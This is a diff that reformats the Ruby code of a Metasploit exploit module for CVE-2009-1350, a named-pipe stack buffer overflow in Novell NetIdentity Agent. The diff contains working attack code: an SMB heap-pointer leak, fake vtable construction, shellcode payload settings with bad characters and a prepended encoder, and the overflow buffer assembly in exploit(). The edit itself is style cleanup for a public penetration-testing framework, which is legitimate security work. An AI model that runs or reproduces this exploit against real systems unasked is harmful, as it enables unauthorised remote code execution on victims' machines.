@@ -9,48 +9,54 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::SMB::Client
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',
+        'Description' => %q{
           This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending
-        a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be
-        able to execute arbitrary code. The success of this module is much greater once the
-        service has been restarted.
-      },
-      'Author'         => [ 'MC', 'Ruben Santamarta' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+          a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be
+          able to execute arbitrary code. The success of this module is much greater once the
+          service has been restarted.
+        },
+        'Author' => [ 'MC', 'Ruben Santamarta' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2009-1350' ],
           [ 'OSVDB', '53351' ],
           [ 'BID', '34400' ],
           [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ],
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process', # only one shot!
         },
-      'Payload'	=>
-        {
+        'Payload' => {
           'Space'	=> 550,
           'BadChars' => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40",
           'StackAdjustment' => -3500,
           'PrependEncoder' => "\x81\xe4\xf0\xff\xff\xff",
         },
-      'Platform'	=> 'win',
-      'Targets'	=>
-        [
+        'Platform'	=> 'win',
+        'Targets' => [
           [ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ],
         ],
-      'Privileged'	 => true,
-      'DisclosureDate' => '2009-04-06',
-      'DefaultTarget'	 => 0))
+        'Privileged'	=> true,
+        'DisclosureDate' => '2009-04-06',
+        'DefaultTarget'	=> 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
         OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit'], fallbacks: ['USERNAME']),
         OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit'], fallbacks: ['PASSWORD'])
-      ])
+      ]
+    )
 
     deregister_options('SMB::ProtocolVersion')
   end
@@ -93,13 +99,13 @@ class MetasploitModule < Msf::Exploit::Remote
     trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
 
     # Send the first request to get our pointer.
-    leak =  [0x00000004].pack('V') + [0x00000818].pack('V')
+    leak = [0x00000004].pack('V') + [0x00000818].pack('V')
     leak << rand_text_alpha_upper(2040)
 
     print_status("Sending malformed request...")
     pipe.write(leak)
 
-    heap_pointer_leaked = pipe.read()[2060,4].unpack('V')[0]
+    heap_pointer_leaked = pipe.read()[2060, 4].unpack('V')[0]
     print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))
 
     print_status("Building fake VTable...")
@@ -112,15 +118,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
     pipe.close
 
-    return heap_pointer_leaked,object,method,shellcode
+    return heap_pointer_leaked, object, method, shellcode
   end
 
   def exploit
-    heap_pointer_leaked,object,method,shellcode = mem_leak()
+    heap_pointer_leaked, object, method, shellcode = mem_leak()
 
     return if not shellcode
 
-    sploit =  [0x00000002].pack('V')
+    sploit = [0x00000002].pack('V')
     sploit << [0x00000000].pack('V')
     sploit << [object].pack('V')
     sploit << [0x00000000].pack('V')
